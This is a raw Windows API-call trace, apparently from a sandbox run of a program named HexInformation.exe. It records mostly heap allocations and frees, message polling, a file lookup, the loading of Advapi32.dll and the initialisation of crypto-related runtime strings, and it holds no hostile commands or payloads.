[0175.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0175.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0175.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0175.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0175.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0175.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0175.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0175.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0175.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0175.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0175.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0175.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0175.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0175.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0175.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0175.037] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/HexInformation.exe", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6f0ebef, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xe6f0ebef, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd3e7b28f, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x1f0c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="HexInformation.exe", cAlternateFileName="HEXINF~1.EXE")) returned 0xa87610 [0175.037] FindClose (in: hFindFile=0xa87610 | out: hFindFile=0xa87610) returned 1 [0175.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0175.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0175.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0175.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0175.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0175.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0175.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0175.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0175.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0175.037] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0175.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0175.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0175.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0175.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0175.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0175.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0175.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0175.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0175.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0175.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0175.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0175.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0175.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0175.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0175.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0175.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0175.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0175.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0175.038] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0175.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0175.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0175.038] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0175.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0175.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0175.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0175.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0175.039] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0175.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0175.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0175.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0175.039] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0175.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0175.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0175.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0175.039] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0175.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0175.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0175.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0175.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0175.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0175.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0175.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0175.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0175.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0175.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0175.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0175.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0175.040] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0175.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0175.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0175.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0175.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0175.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0175.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0175.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0175.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0175.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0175.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0175.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0175.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0175.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0175.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0175.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0175.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0175.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0175.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0175.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0175.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0175.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0175.041] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0175.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0175.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0175.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0175.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0175.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0175.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0175.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0175.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0175.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0175.041] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0175.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0175.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0175.041] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0175.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0175.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0175.042] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0175.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0175.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0175.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0175.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0175.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0175.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0175.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0175.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0175.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0175.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0175.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0175.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0175.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0175.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0175.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0175.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0175.042] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0175.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0175.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0175.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0175.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0175.042] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0175.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0175.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0175.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0175.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0175.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0175.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0175.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0175.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0175.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0175.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0175.043] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0175.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0175.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0175.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0175.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0175.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0175.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0175.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0175.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0175.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0175.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0175.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0175.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0175.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0175.043] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0175.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0175.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0175.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0175.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0175.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0175.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0175.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0175.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0175.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0175.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0175.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0175.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0175.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0175.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0175.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0175.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0175.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0175.044] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0175.044] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0175.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0175.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0175.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0175.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0175.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0175.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0175.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0175.045] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0175.045] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0175.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0175.045] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0175.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0175.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0175.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0175.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0175.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0175.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0175.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0175.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0175.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0175.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0175.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0175.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0175.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0175.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0175.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0175.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0175.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0175.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0175.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0175.046] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0175.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0175.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0175.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0175.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0175.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0175.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0175.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0175.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0175.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0175.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0175.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0175.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0175.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0175.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0175.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0175.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0175.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0175.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0175.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 